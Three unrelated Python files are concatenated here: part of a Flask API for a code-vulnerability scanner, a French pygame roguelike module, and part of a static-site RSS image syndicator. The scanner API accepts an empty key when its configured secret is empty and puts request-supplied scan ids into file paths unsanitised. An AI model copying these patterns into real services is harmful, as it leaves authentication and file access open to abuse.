        output = data.get("output")
        rule = data.get("rule")

        is_valid_key = key_verify(data=data)
        if is_valid_key is not True:
            return is_valid_key

        if not target or target == "":
            return {"code": 1002, "result": "URL cannot be empty."}
        # Fall back to defaults for the optional fields.
        if not formatter or formatter == '':
            formatter = 'json'
        if not output or output == '':
            output = ''
        if not rule or rule == '':
            rule = ''

        # Report all id (identifies the whole batch of targets).
        a_sid = get_sid(target, True)
        # A single target and a list of targets are handled uniformly:
        # one scan task per target, all under the same batch sid.
        # (The original duplicated the producer call and result dict per branch.)
        targets = target if isinstance(target, list) else [target]
        for t in targets:
            producer(task=(t, formatter, output, rule, a_sid))
        result = {
            "msg": "Add scan job successfully.",
            "sid": a_sid,
        }

        # Initialise the batch bookkeeping files.
        a_sid_data = {
            'sids': {}
        }
        running = Running(a_sid)
        # Write a_sid running data
        running.list(a_sid_data)
        # Write a_sid running status
        status_data = {
            'status': 'running',
            'report': ''
        }
        running.status(status_data)
        return {"code": 1001, "result": result}
class JobStatus(Resource):
    """POST /api/status — report the status of a previously queued scan batch."""

    @staticmethod
    def post():
        data = request.json
        if not data or data == "":
            return {"code": 1003, "result": "Only support json, please post json data."}

        sid = data.get("sid")
        is_valid_key = key_verify(data=data)
        if is_valid_key is not True:
            return is_valid_key

        if not sid or sid == "":
            return {"code": 1002, "result": "sid is required."}

        # sid is interpolated into file paths below; coerce it to a string.
        sid = str(sid)
        running = Running(sid)
        if running.is_file() is not True:
            data = {
                'msg': 'scan id not exist!',
                'sid': sid,
                'status': 'no such scan',
                'report': ''
            }
        else:
            result = running.status()
            if result['status'] == 'running':
                r_data = running.list()
                ret = True
                logger.info(r_data['sids'])
                # BUG FIX: the loop variable used to shadow the requested
                # `sid`, so the response reported the last sub-scan id
                # instead of the batch id. Use a distinct name.
                for s_sid, target in r_data['sids'].items():
                    if Running(s_sid).is_file(True) is False:
                        ret = False
                if ret:
                    # Every sub-scan has produced its data file: batch is done.
                    result['status'] = 'done'
                    running.status(result)
            data = {
                'msg': 'success',
                'sid': sid,
                'status': result['status'],
                'report': result['report']
            }
        return {"code": 1001, "result": data}
@app.route('/', methods=['GET', 'POST'])
def summary():
    """Render the batch summary page for the scan id passed as ``?sid=``."""
    a_sid = request.args.get(key='sid')
    if a_sid is None:
        return 'No sid specified.'
    # Per-batch bookkeeping files written by the scanner.
    scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
    scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
    if not os.path.isfile(scan_status_file):
        return 'No such scan.'
    with open(scan_status_file, 'r') as f:
        scan_status = json.load(f).get('status')
    with open(scan_list_file, 'r') as f:
        scan_list = json.load(f).get('sids')
    if scan_status == 'running':
        return 'Scan job is still running, Please check later.'
    # Use the status file's creation time as the scan start time.
    start_time = os.path.getctime(filename=scan_status_file)
    start_time = time.localtime(start_time)
    start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
    total_targets_number = len(scan_list)
    total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
    rule_filter = dict()  # rule name -> number of findings across all targets
    targets = list()
    for s_sid in scan_list.keys():
        target_info = dict()
        target_info.update({
            'sid': s_sid,
            'target': scan_list.get(s_sid),
        })
        s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
        with open(s_sid_file, 'r') as f:
            s_sid_data = json.load(f)
        total_vul_number += len(s_sid_data.get('vulnerabilities'))
        target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))})
        target_info.update(s_sid_data)
        targets.append(target_info)
        # Bucket each finding by its severity level (1-10).
        for vul in s_sid_data.get('vulnerabilities'):
            if 9 <= int(vul.get('level')) <= 10:
                critical_vul_number += 1
            elif 6 <= int(vul.get('level')) <= 8:
                high_vul_number += 1
            elif 3 <= int(vul.get('level')) <= 5:
                medium_vul_number += 1
            elif 1 <= int(vul.get('level')) <= 2:
                low_vul_number += 1
            try:
                rule_filter[vul.get('rule_name')] += 1
            except KeyError:
                rule_filter[vul.get('rule_name')] = 1
    return render_template(template_name_or_list='summary.html',
                           total_targets_number=total_targets_number,
                           start_time=start_time,
                           targets=targets,
                           a_sid=a_sid,
                           total_vul_number=total_vul_number,
                           critical_vul_number=critical_vul_number,
                           high_vul_number=high_vul_number,
                           medium_vul_number=medium_vul_number,
                           low_vul_number=low_vul_number,
                           vuls=rule_filter, )
@app.route('/report/<path:a_sid>/<path:s_sid>', methods=['GET'])
def report(a_sid, s_sid):
    """Render the detailed vulnerability report for one scanned target."""
    if s_sid is None:
        return 'No sid specified.'
    scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
    scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
    if not os.path.isfile(scan_data_file):
        return 'No such target.'
    with open(scan_data_file, 'r') as f:
        scan_data = json.load(f)
    with open(scan_list_file, 'r') as f:
        scan_list = json.load(f).get('sids')
    # Derive a human-friendly project name from the repository URL.
    project_name = scan_list.get(s_sid).split('/')[-1].replace('.git', '')
    rule_filter = dict()  # finding id -> rule name
    for vul in scan_data.get('vulnerabilities'):
        rule_filter[vul.get('id')] = vul.get('rule_name')
    # Inline the report script so the rendered page is self-contained.
    with open(os.path.join(os.path.dirname(__file__), 'templates/asset/js/report.js')) as f:
        report_js = f.read()
    return render_template(template_name_or_list='result.html',
                           scan_data=json.dumps(scan_data, ensure_ascii=False),
                           report_js=report_js,
                           target_filter=scan_list,
                           project_name=project_name,
                           rule_filter=rule_filter)
def key_verify(data):
    """Validate the API key supplied in *data* against the configured secret.

    Returns True on success, otherwise an error dict suitable as a response.
    """
    key = Config(level1="cobra", level2="secret_key").value
    _key = data.get("key")
    if _key == key:
        # NOTE(review): if the configured secret_key is empty, an empty
        # client key also matches here — confirm this is acceptable.
        return True
    if not _key:
        return {"code": 1002, "result": "Key cannot be empty."}
    # At this point _key is non-empty and differs from key; the original
    # trailing "unknown error" else-branch was unreachable and is removed.
    return {"code": 4002, "result": "Key verify failed."}
def start(host, port, debug):
    """Start the REST API server and the background consumer thread pool.

    :param host: interface to bind the Flask server to
    :param port: TCP port (coerced to int)
    :param debug: enable Flask debug mode
    """
    logger.info('Start {host}:{port}'.format(host=host, port=port))
    api = Api(app)
    api.add_resource(AddJob, '/api/add')
    api.add_resource(JobStatus, '/api/status')

    # Start a pool of daemon threads that pull scan jobs off the queue.
    for _ in range(10):
        worker = threading.Thread(target=consumer, args=())
        # .daemon attribute replaces the deprecated setDaemon(); daemon
        # threads do not block process shutdown.
        worker.daemon = True
        worker.start()

    try:
        app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
    except socket.error as v:
        if v.errno == errno.EACCES:
            logger.critical('[{err}] must root permission for start API Server!'.format(err=v.strerror))
            exit()
        else:
            logger.critical('{msg}'.format(msg=v.strerror))

    logger.info('API Server start success')
|
import pygame as pg
import Sprites
import Alt
from random import randrange
class Player:
    """The player character: grid position, stats, inventory, and per-frame
    input handling (movement, melee attack, ranged attack, backpack).

    Tile values used throughout: 1 = door, 2 = wall, 3 = stairs down.
    NOTE(review): the nesting below was reconstructed from an
    indentation-stripped source — verify against the original file.
    """

    def __init__(self, x, y):
        """Create the player at grid position (x, y) on floor 1."""
        self.x = x
        self.y = y
        self.score = 0
        self.etage = 1                  # current dungeon floor
        self.vie = 10                   # current hit points
        self.vie_max = 10               # maximum hit points
        self.range = 5                  # projectile range, in tiles
        self.vel = 1
        self.dx = 0                     # facing direction, set by movement keys
        self.dy = 0
        self.objets = []                # inventory
        self.etage = 1                  # duplicate of the assignment above; harmless
        self.niv = Alt.Niveau(self.etage)
        self.fini_move = False          # True once this key press consumed a move
        self.tour = True                # True while it is still the player's turn
        self.mort = False
        self.cd = False                 # backpack input cooldown
        self.pos_sac = 0                # selected inventory slot
        self.sprite_joueur = Sprites.player
        self.sprite_epee = Sprites.epee
        self.sprite_projectile = Sprites.magie

    def move(self):
        """Handle WASD movement; with CTRL held, only change facing.

        Stepping onto a door tile (1) transfers the player to the adjacent
        room; standing on stairs (3) descends one floor.
        """
        self.keys = pg.key.get_pressed()
        if self.keys[pg.K_a]:
            if self.keys[pg.K_LCTRL]:
                # CTRL held: turn to face left without stepping.
                self.dx = -1
                self.dy = 0
            elif self.niv.salle_active.salle[self.y][self.x - 1] != 2 and not (self.fini_move) and not (self.niv.salle_active.ennemi_ici(self.x - 1, self.y)):
                self.x -= 1
                self.dx = -1
                self.dy = 0
                if self.niv.salle_active.salle[self.y][self.x] == 1:
                    # Door: switch the active room to the left neighbour on the map.
                    self.niv.ind_salle_prev = self.niv.ind_salle_active
                    self.donnees = [self.niv.salle_active.xi, self.niv.salle_active.yi, self.niv.salle_active.l, self.niv.salle_active.h, self.niv.salle_active.taille_unite]
                    self.coords = [self.donnees[0] - 1, self.donnees[1] + (self.y // self.donnees[4])]
                    self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
                    self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
                    self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
                    # Re-enter at the right edge of the new room.
                    self.x = len(self.niv.salle_active.salle[0]) - 2
                    self.y = (self.coords[1] - self.niv.salle_active.yi) * self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite // 2
                    self.fini_move = True
                if self.niv.salle_active.objet_ici(self.x, self.y):
                    # Pick up any object lying on the destination tile.
                    self.ind_objet = self.niv.salle_active.objet_ici(self.x, self.y) - 1
                    self.pickup(self.niv.salle_active.objets[self.ind_objet])
                    self.niv.salle_active.objets.pop(self.ind_objet)
                self.tour = False
                self.fini_move = True
        if self.keys[pg.K_d]:
            if self.keys[pg.K_LCTRL]:
                # CTRL held: turn to face right without stepping.
                self.dx = 1
                self.dy = 0
            elif self.niv.salle_active.salle[self.y][self.x + 1] != 2 and not (self.fini_move) and not (self.niv.salle_active.ennemi_ici(self.x + 1, self.y)):
                self.x += 1
                self.dx = 1
                self.dy = 0
                if self.niv.salle_active.salle[self.y][self.x] == 1:
                    # Door: switch the active room to the right neighbour.
                    self.niv.ind_salle_prev = self.niv.ind_salle_active
                    self.donnees = [self.niv.salle_active.xi, self.niv.salle_active.yi, self.niv.salle_active.l, self.niv.salle_active.h, self.niv.salle_active.taille_unite]
                    self.coords = [self.donnees[0] + self.donnees[2], self.donnees[1] + (self.y // self.donnees[4])]
                    self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
                    self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
                    self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
                    # Re-enter at the left edge of the new room.
                    self.x = 1
                    self.y = (self.coords[1] - self.niv.salle_active.yi) * self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite // 2
                    self.fini_move = True
                if self.niv.salle_active.objet_ici(self.x, self.y):
                    self.ind_objet = self.niv.salle_active.objet_ici(self.x, self.y) - 1
                    self.pickup(self.niv.salle_active.objets[self.ind_objet])
                    self.niv.salle_active.objets.pop(self.ind_objet)
                self.fini_move = True
                self.tour = False
        if self.keys[pg.K_w]:
            if self.keys[pg.K_LCTRL]:
                # CTRL held: turn to face up without stepping.
                self.dx = 0
                self.dy = -1
            elif self.niv.salle_active.salle[self.y - 1][self.x] != 2 and not (self.fini_move) and not (self.niv.salle_active.ennemi_ici(self.x, self.y - 1)):
                self.y -= 1
                self.dx = 0
                self.dy = -1
                if self.niv.salle_active.salle[self.y][self.x] == 1:
                    # Door: switch the active room to the neighbour above.
                    self.niv.ind_salle_prev = self.niv.ind_salle_active
                    self.donnees = [self.niv.salle_active.xi, self.niv.salle_active.yi, self.niv.salle_active.l, self.niv.salle_active.h, self.niv.salle_active.taille_unite]
                    self.coords = [self.donnees[0] + (self.x // self.donnees[4]), self.donnees[1] - 1]
                    self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
                    self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
                    self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
                    # Re-enter at the bottom edge of the new room.
                    self.x = (self.coords[0] - self.niv.salle_active.xi) * self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite // 2
                    self.y = len(self.niv.salle_active.salle) - 2
                    self.fini_move = True
                if self.niv.salle_active.objet_ici(self.x, self.y):
                    self.ind_objet = self.niv.salle_active.objet_ici(self.x, self.y) - 1
                    self.pickup(self.niv.salle_active.objets[self.ind_objet])
                    self.niv.salle_active.objets.pop(self.ind_objet)
                self.fini_move = True
                self.tour = False
        if self.keys[pg.K_s]:
            if self.keys[pg.K_LCTRL]:
                # CTRL held: turn to face down without stepping.
                self.dx = 0
                self.dy = 1
            elif self.niv.salle_active.salle[self.y + 1][self.x] != 2 and not (self.fini_move) and not (self.niv.salle_active.ennemi_ici(self.x, self.y + 1)):
                self.y += 1
                self.dx = 0
                self.dy = 1
                if self.niv.salle_active.salle[self.y][self.x] == 1:
                    # Door: switch the active room to the neighbour below.
                    self.niv.ind_salle_prev = self.niv.ind_salle_active
                    self.donnees = [self.niv.salle_active.xi, self.niv.salle_active.yi, self.niv.salle_active.l, self.niv.salle_active.h, self.niv.salle_active.taille_unite]
                    self.coords = [self.donnees[0] + (self.x // self.donnees[4]), self.donnees[1] + self.donnees[3]]
                    self.niv.ind_salle_active = self.niv.carte[self.coords[1]][self.coords[0]] - 1
                    self.niv.salles[self.niv.ind_salle_prev] = self.niv.salle_active
                    self.niv.salle_active = self.niv.salles[self.niv.ind_salle_active]
                    # Re-enter at the top edge of the new room.
                    self.x = (self.coords[0] - self.niv.salle_active.xi) * self.niv.salle_active.taille_unite + self.niv.salle_active.taille_unite // 2
                    self.y = 1
                    self.fini_move = True
                if self.niv.salle_active.objet_ici(self.x, self.y):
                    self.ind_objet = self.niv.salle_active.objet_ici(self.x, self.y) - 1
                    self.pickup(self.niv.salle_active.objets[self.ind_objet])
                    self.niv.salle_active.objets.pop(self.ind_objet)
                self.fini_move = True
                self.tour = False
        if not (self.keys[pg.K_a] or self.keys[pg.K_d] or self.keys[pg.K_w] or self.keys[pg.K_s]):
            # All movement keys released: re-arm movement for the next press.
            self.fini_move = False
        if self.niv.salle_active.salle[self.y][self.x] == 3:
            # Stairs: descend to a freshly generated floor.
            self.ind_salle_active = 0
            self.etage += 1
            self.niv = Alt.Niveau(self.etage)
            self.x, self.y = 3, 3
            self.score += 20

    def melee(self, screen):
        """Swing the sword toward the pressed arrow key (2 damage, 1 stun)."""
        keys = pg.key.get_pressed()
        if keys[pg.K_UP]:
            self.render(screen)
            screen.blit(self.sprite_epee, (self.niv.salle_active.dif_affichage[0] + self.x * Sprites.taille, self.niv.salle_active.dif_affichage[1] + self.y * Sprites.taille - Sprites.taille // 2))
            pg.display.update()
            pg.time.delay(200)
            if self.niv.salle_active.ennemi_ici(self.x, self.y - 1):
                self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x, self.y - 1) - 1
                self.niv.salle_active.ennemis[self.ind_ennemi].hit(2, 1, self)
                self.fini_move = True
                self.tour = False
            pg.time.delay(200)
        if keys[pg.K_DOWN]:
            self.render(screen)
            screen.blit(pg.transform.rotate(self.sprite_epee, 180), (self.niv.salle_active.dif_affichage[0] + self.x * Sprites.taille, self.niv.salle_active.dif_affichage[1] + self.y * Sprites.taille + Sprites.taille // 2))
            pg.display.update()
            pg.time.delay(200)
            if self.niv.salle_active.ennemi_ici(self.x, self.y + 1):
                self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x, self.y + 1) - 1
                self.niv.salle_active.ennemis[self.ind_ennemi].hit(2, 1, self)
                self.fini_move = True
                self.tour = False
            pg.time.delay(200)
        if keys[pg.K_LEFT]:
            self.render(screen)
            screen.blit(pg.transform.rotate(self.sprite_epee, 90), (self.niv.salle_active.dif_affichage[0] + self.x * Sprites.taille - Sprites.taille // 2, self.niv.salle_active.dif_affichage[1] + self.y * Sprites.taille))
            pg.display.update()
            pg.time.delay(200)
            if self.niv.salle_active.ennemi_ici(self.x - 1, self.y):
                self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x - 1, self.y) - 1
                self.niv.salle_active.ennemis[self.ind_ennemi].hit(2, 1, self)
                self.fini_move = True
                self.tour = False
            pg.time.delay(200)
        if keys[pg.K_RIGHT]:
            self.render(screen)
            screen.blit(pg.transform.rotate(self.sprite_epee, 270), (self.niv.salle_active.dif_affichage[0] + self.x * Sprites.taille + Sprites.taille // 2, self.niv.salle_active.dif_affichage[1] + self.y * Sprites.taille))
            pg.display.update()
            pg.time.delay(200)
            if self.niv.salle_active.ennemi_ici(self.x + 1, self.y):
                self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x + 1, self.y) - 1
                self.niv.salle_active.ennemis[self.ind_ennemi].hit(2, 1, self)
                self.fini_move = True
                self.tour = False
            pg.time.delay(200)

    def shoot(self, screen):
        """Fire a projectile (SPACE) along the facing direction.

        The projectile flies until it hits a wall/door, exceeds
        ``self.range`` tiles, or hits an enemy (1 damage, 1 stun).
        """
        keys = pg.key.get_pressed()
        if keys[pg.K_SPACE]:
            self.stop = False
            range_check = self.range * Sprites.taille   # remaining travel, in pixels
            x = 0                                       # pixel offset from the player
            y = 0
            dif = self.niv.salle_active.dif_affichage
            while self.stop == False:
                x = x + self.dx
                y = y + self.dy
                range_check = range_check - 1
                self.niv.salle_active.aff(screen)
                # Draw the projectile rotated to match the travel direction.
                if self.dy == 0:
                    screen.blit(pg.transform.rotate(self.sprite_projectile, -self.dx * 90), (self.x * Sprites.taille + dif[0] + x, self.y * Sprites.taille + dif[1] + y))
                elif self.dy == -1:
                    screen.blit(self.sprite_projectile, (self.x * Sprites.taille + dif[0] + x * Sprites.taille, self.y * Sprites.taille + dif[1] + y))
                elif self.dy == 1:
                    screen.blit(pg.transform.rotate(self.sprite_projectile, 180), (self.x * Sprites.taille + dif[0] + x, self.y * Sprites.taille + dif[1] + y))
                self.render(screen)
                pg.display.update()
                if 0 < self.niv.salle_active.salle[self.y + y // Sprites.taille][self.x + x // Sprites.taille] <= 2 or range_check < 0:
                    # Hit a wall/door, or ran out of range.
                    self.stop = True
                    self.fini_move = True
                    self.tour = False
                    break
                if self.niv.salle_active.ennemi_ici(self.x + x // Sprites.taille, self.y + y // Sprites.taille):
                    # Hit an enemy.
                    self.stop = True
                    self.fini_move = True
                    self.tour = False
                    self.ind_ennemi = self.niv.salle_active.ennemi_ici(self.x + x // Sprites.taille, self.y + y // Sprites.taille, ) - 1
                    self.niv.salle_active.ennemis[self.ind_ennemi].hit(1, 1, self)

    def render(self, screen):
        """Blit the player sprite at its grid position in the active room."""
        screen.blit(self.sprite_joueur, (self.niv.salle_active.dif_affichage[0] + Sprites.taille * self.x, self.niv.salle_active.dif_affichage[1] + Sprites.taille * self.y))

    def hit(self):
        """Take one point of damage; die at zero life."""
        self.vie -= 1
        if self.vie <= 0:
            self.mort = True

    def backpack(self, screen):
        """Navigate the inventory (J/K or Q/E) and use the selected item (RETURN).

        ``self.cd`` debounces key repeats until all backpack keys are released.
        """
        keys = pg.key.get_pressed()
        if len(self.objets) > 0:
            if (keys[pg.K_k] or keys[pg.K_e]) and not self.cd:
                self.pos_sac = min(len(self.objets) - 1, self.pos_sac + 1)
                self.cd = True
            if (keys[pg.K_j] or keys[pg.K_q]) and not self.cd:
                self.pos_sac = max(0, self.pos_sac - 1)
                self.cd = True
            if keys[pg.K_RETURN] and not self.cd:
                self.cd = True
                # Consume the selected item (using an item costs 5 score).
                self.objets[self.pos_sac].use(self, screen)
                del self.objets[self.pos_sac]
                self.pos_sac = min(self.pos_sac, len(self.objets) - 1)
                self.score -= 5
        if not (keys[pg.K_RETURN] or keys[pg.K_k] or keys[pg.K_j] or keys[pg.K_q] or keys[pg.K_e]):
            # All backpack keys released: re-arm the cooldown.
            self.cd = False

    def pickup(self, item):
        """Add *item* to the inventory and select it (17, 7 is the HUD slot)."""
        item.x = 17
        item.y = 7
        self.objets.append(item)
        self.pos_sac = len(self.objets) - 1

    def tick(self, screen):
        """Process one frame of player input."""
        self.backpack(screen)
        self.move()
        self.melee(screen)
        self.shoot(screen)
class Ennemi:
    """A basic enemy that chases the player one tile per turn."""

    def __init__(self, x, y, salle):
        self.x = x
        self.y = y
        self.vie = 4            # hit points
        self.stun = 0           # remaining stunned turns
        self.sprite = Sprites.mechant
        self.salle = salle
        self.dif_affichage = self.salle.dif_affichage
        self.visible = True

    def deplacement(self, joueur, screen):
        """Step one tile toward the player; attack instead of stepping onto them.

        The step is skipped when another enemy occupies the destination tile.
        """
        if self.x + self.dx == joueur.x and self.y + self.dy == joueur.y:
            joueur.hit()
        elif not joueur.niv.salle_active.ennemi_ici(self.x + self.dx, self.y + self.dy):
            self.x = self.x + self.dx
            self.y = self.y + self.dy

    def find(self, joueur):
        """Set (dx, dy) to the unit step toward the player's position.

        BUG FIX: the original wrapped this in a nested loop over every room
        tile, recomputing the same result len(salle) * len(salle[0]) times;
        a single pass yields the identical (dx, dy).
        """
        if self.x > joueur.x:
            self.dx = -1
        elif self.x == joueur.x:
            self.dx = 0
        else:
            self.dx = 1
        if self.y > joueur.y:
            self.dy = -1
        elif self.y == joueur.y:
            self.dy = 0
        else:
            self.dy = 1

    def hit(self, dmg, stun, joueur):
        """Apply damage and stun; award 10 score to the player on a kill."""
        self.vie -= dmg
        self.stun += stun
        if self.vie <= 0:
            self.mort()
            joueur.score += 10

    def tick(self, joueur, screen):
        """Run one turn: chase the player, or sit out a stunned turn."""
        if self.stun == 0:
            self.find(joueur)
            self.deplacement(joueur, screen)
        else:
            self.stun = self.stun - 1

    def aff(self, screen, coords):
        """Blit the enemy sprite at its grid position, offset by *coords*."""
        screen.blit(self.sprite, (coords[0] + self.x * Sprites.taille, coords[1] + self.y * Sprites.taille))

    def mort(self):
        """Hide the corpse and park it off-grid (leftover debug print removed)."""
        self.visible = False
        self.x, self.y = -1, -1
class Potion:
    """Healing potion pickup; restores a random amount of life when used."""

    def __init__(self, x, y, deb=False):
        self.x = x
        self.y = y
        # Starting-room potions (deb=True) heal less than regular drops.
        self.vie = randrange(1, 3) if deb else randrange(1, 7)
        self.Sprite = Sprites.potion
        self.nom = "Potion de vie ( " + str(self.vie) + " )"
        self.sous_nom = ""

    def use(self, joueur, screen):
        """Heal the player, capped at their maximum life."""
        joueur.vie = min(joueur.vie + self.vie, joueur.vie_max)

    def draw(self, screen, salle, show=False):
        """Blit the potion; HUD mode (show=True) skips the room offset."""
        offset = [0, 0] if show else salle.dif_affichage
        position = (self.x * Sprites.taille + offset[0], self.y * Sprites.taille + offset[1])
        screen.blit(self.Sprite, position)
class Gemme:
    """Attack gem: damages and stuns every enemy in the active room."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.stun = randrange(4) + 1
        self.dmg = randrange(4) + 1
        # Bright random colour shared by the pickup and the flash effect.
        self.color_circle = (randrange(120, 255), randrange(120, 255), randrange(120, 255))
        self.nom = "Gemme d'attaque"
        self.sous_nom = "Étourd. : " + str(self.stun) + ", Dégats :" + str(self.dmg)

    def use(self, joueur, screen):
        """Hit every enemy in the current room, then flash the screen border."""
        for ennemi in joueur.niv.salle_active.ennemis:
            ennemi.hit(self.dmg, self.stun, joueur)
        frame = (0, 0, 15 * Sprites.taille, 15 * Sprites.taille)
        pg.draw.rect(screen, (self.color_circle), frame, Sprites.taille // 2)
        pg.display.update()
        pg.time.delay(250)
        pg.draw.rect(screen, (0, 0, 0), frame, Sprites.taille // 2)
        pg.display.update()

    def draw(self, screen, salle, show=False):
        """Draw the gem; HUD mode (show=True) skips the room offset."""
        offset = [0, 0] if show else salle.dif_affichage
        cx = self.x * Sprites.taille + Sprites.taille // 2 + offset[0]
        cy = self.y * Sprites.taille + Sprites.taille // 2 + offset[1]
        pg.draw.circle(screen, (self.color_circle), (cx, cy), Sprites.taille // 4, 0)
        pg.draw.circle(screen, (200, 200, 200), (cx, cy), Sprites.taille // 4, 2)
|
# Copyright 2018, The Ssite Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Syndicate content to an RSS file."""
import hashlib
import os
import os.path
import shutil
import subprocess
import bs4
import jinja2
from PIL import Image, ImageSequence
import ssite.blog
import ssite.hentry
def is_animated(im):
    """Return True if *im* contains more than one frame."""
    frames = iter(ImageSequence.Iterator(im))
    # Consume the first frame; animation means a second one exists.
    next(frames, None)
    return next(frames, None) is not None
def resize_static_image(im, resized_path, resize_to, is_pixel_art=True):
    """Resize a single-frame image and save it to *resized_path*.

    NEAREST keeps pixel art sharp; LANCZOS gives high-quality photo
    resizing. The output is saved with Pillow's optimize flag.
    """
    resample_filter = Image.NEAREST if is_pixel_art else Image.LANCZOS
    im.resize(resize_to, resample=resample_filter).save(
        resized_path, optimize=True
    )
def resize_animation(original_path, resized_path, resize_to, is_pixel_art=True):
    """Resize an animated GIF using gifsicle.

    Pillow's optimization is insufficient for large GIFs, so shell out to
    gifsicle to resize and optimize instead.

    Args:
        original_path: path of the source GIF.
        resized_path: path to write the resized GIF to.
        resize_to: (width, height) tuple in pixels.
        is_pixel_art: use gifsicle's "sample" method (no smoothing) so
            pixel art stays sharp.

    Raises:
        subprocess.CalledProcessError: if gifsicle exits with a non-zero
            status (previously failures were silently ignored and a missing
            or broken output file went unnoticed).
    """
    gifsicle_command = [
        "gifsicle",
        "-O3",
        original_path,
        "-o",
        resized_path,
        "--resize",
        "{}x{}".format(*resize_to),
    ]
    if is_pixel_art:
        gifsicle_command += ["--resize-method", "sample"]
    # check=True surfaces gifsicle failures instead of publishing a bad feed.
    subprocess.run(gifsicle_command, check=True)
def resize_image(original_path, resized_path, resize_width=600, is_pixel_art=True):
    """Resize *original_path* to *resize_width* keeping aspect ratio.

    Dispatches to resize_animation for multi-frame images and to
    resize_static_image otherwise.

    Args:
        original_path: path of the source image.
        resized_path: path to write the resized image to.
        resize_width: target width in pixels; height is derived from the
            original aspect ratio.
        is_pixel_art: forwarded to the resizer to pick a sharp resample.

    Returns:
        The (width, height) tuple actually used.
    """
    # Context manager fixes a file-handle leak: the original Image.open
    # was never closed.
    with Image.open(original_path) as im:
        orig_w, orig_h = im.size
        orig_aspect_ratio = orig_w / orig_h
        resize_height = int(resize_width / orig_aspect_ratio)
        resize_to = (resize_width, resize_height)
        if is_animated(im):
            resize_animation(
                original_path, resized_path, resize_to, is_pixel_art=is_pixel_art
            )
        else:
            resize_static_image(im, resized_path, resize_to, is_pixel_art=is_pixel_art)
    return resize_to
def syndicate_images(soup, syndication_url, output_dir, site_root, content_path):
    """Write syndicated images to ``output_dir``.

    Modifies image source attributes in ``soup`` in place: each local image
    is copied into a content-addressed directory under ``output_dir/images``
    and (for bitmap formats, excluding thumbnails) resized to 600px width;
    the ``<img>`` src is rewritten to the syndicated URL and, when known,
    width/height attributes are set.
    """
    for img in soup.find_all("img"):
        # assumes img_props exposes 'is_thumbnail' and 'is_pixel_art' keys
        # (see ssite.hentry.photo_template) -- TODO confirm.
        img_props = ssite.hentry.photo_template(img)
        local_path = ssite.blog.calculate_filepath(site_root, content_path, img["src"])
        # Image source is already absolute.
        if local_path is None:
            continue
        with open(local_path, "rb") as image_file:
            image_bytes = image_file.read()
        # Create a directory based on the hash of the image to de-duplicate and
        # uniquely identify an image so that resized versions are grouped
        # together.
        image_hash = hashlib.sha256(image_bytes).hexdigest()
        destination_dir = os.path.join(
            output_dir, "images", "sha256-{}".format(image_hash)
        )
        os.makedirs(destination_dir, exist_ok=True)
        extension = os.path.splitext(local_path)[1].lower()
        destination_original = os.path.join(
            destination_dir, "original{}".format(extension)
        )
        # Copy is idempotent: identical content hashes to the same directory.
        if not os.path.exists(destination_original):
            shutil.copy(local_path, destination_original)
        width = None
        height = None
        if (
            # Don't try to resize SVGs or other non-bitmap formats.
            # TODO: what other image formats should we resize?
            extension in (".png", ".gif", ".jpg", ".jpeg")
            # Keep thumbnails at their original resolution.
            and not img_props["is_thumbnail"]
        ):
            destination_resized = os.path.join(
                destination_dir, "resized-600px{}".format(extension)
            )
            if not os.path.exists(destination_resized):
                width, height = resize_image(
                    local_path,
                    destination_resized,
                    is_pixel_art=img_props["is_pixel_art"],
                )
            else:
                # Already resized, grab the image size.
                im = Image.open(destination_resized)
                width, height = im.size
        else:
            # TODO: render SVGs?
            destination_resized = destination_original
        # Point the document at the syndicated copy.
        img["src"] = "{}{}".format(
            syndication_url, os.path.relpath(destination_resized, start=output_dir)
        )
        # width/height stay unset for non-resized formats and thumbnails.
        if height:
            img["height"] = str(height)
        if width:
            img["width"] = str(width)
def replace_urls_with_absolute(soup, prefix, root, content_path):
    """Rewrite relative link/media URLs in *soup* to absolute URLs, in place.

    Covers anchor hrefs, <source> srcs and <video> posters. Tags lacking the
    relevant attribute are skipped: the original code indexed the attribute
    unconditionally and raised KeyError on e.g. a <video> without a poster.
    """
    for link in soup.find_all("a", href=True):
        link["href"] = ssite.blog.calculate_absolute_url(
            prefix, root, content_path, link["href"]
        )
    # TODO: What to do for video embeds?
    for source in soup.find_all("source", src=True):
        source["src"] = ssite.blog.calculate_absolute_url(
            prefix, root, content_path, source["src"]
        )
    for video in soup.find_all("video", poster=True):
        video["poster"] = ssite.blog.calculate_absolute_url(
            prefix, root, content_path, video["poster"]
        )
def summary_from_path(
    site_root, index_root, path, path_date, syndication_url, output_dir
):
    """Open the entry at *path* (relative to *index_root*) and summarize it."""
